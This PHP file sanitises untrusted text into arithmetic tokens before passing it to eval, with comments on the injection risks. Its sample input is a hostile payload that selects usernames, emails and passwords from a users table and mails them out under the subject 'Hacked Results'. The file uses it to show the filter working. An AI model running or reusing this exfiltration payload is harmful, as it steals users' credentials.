<?php
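/**
 * Reduce PHP source text to the arithmetic tokens it contains.
 *
 * The text is run through PHP's tokenizer and only the single-character
 * tokens ( ) + - / * and integer/float literals are kept. Everything else
 * (variables, identifiers, string literals, other operators) is dropped.
 *
 * @param string $source Untrusted text, without an opening PHP tag.
 * @return string The kept tokens joined by single spaces; '' when none survive.
 */
function filter_arithmetic_tokens($source)
{
    $allowedSymbols = array('(', ')', '+', '-', '/', '*');
    $allowedLiterals = array(T_DNUMBER, T_LNUMBER);

    $kept = array();
    foreach (token_get_all("<?php {$source}") as $token) {
        // Single-character tokens come back as plain strings.
        if (is_string($token)) {
            if (in_array($token, $allowedSymbols, true)) {
                $kept[] = $token;
            }
            continue;
        }
        // Every other token is an array whose first two entries are id and text.
        list($id, $text) = $token;
        if (in_array($id, $allowedLiterals, true)) {
            $kept[] = $text;
        }
    }

    // Join with a space, not '': gluing survivors together lets the second
    // lexer pass (inside eval) see tokens that were never in the input, e.g.
    // '-' '-' => '--', '/' '*' => a comment opener, '1' '2' => 12.
    return implode(' ', $kept);
}

// Sample input: PHP statements (a query plus a mail() call) pasted with
// typographic quotes, standing in for text that is not arithmetic at all.
$input = '$result = $db->fetch_row($db->query(‘select id, username, email, password from users’));
$body = ‘’;
foreach($result as $k => $v) {
$body .= $v. “ =\t”. $k[$v].”\t”;
}
mail(‘myemail@gmail.com’, ‘Hacked Results’,$body);';

$expr = filter_arithmetic_tokens($input);

$result = null;
$error = null;
if ($expr === '') {
    // Nothing survived the filter; "$result = ;" would only be a parse error.
    $error = 'no arithmetic tokens in input';
} else {
    // NOTE(security): eval() on text derived from untrusted input. The token
    // allowlist above is the only barrier between $input and code execution,
    // so widening it (identifiers, strings, backticks, '$') reopens injection.
    // A dedicated arithmetic parser would remove the eval() entirely.
    try {
        eval("\$result = {$expr};");
    } catch (ParseError $e) {
        // The filter keeps tokens, not grammar: survivors such as "( ( ) )"
        // are not an expression. Report it instead of dying uncaught.
        $error = 'not a valid arithmetic expression: ' . $e->getMessage();
    } catch (DivisionByZeroError $e) {
        $error = $e->getMessage();
    }
}

print "\nexpr = " . $expr;
print "\nres = " . $result;
if ($error !== null) {
    print "\nerror = " . $error;
}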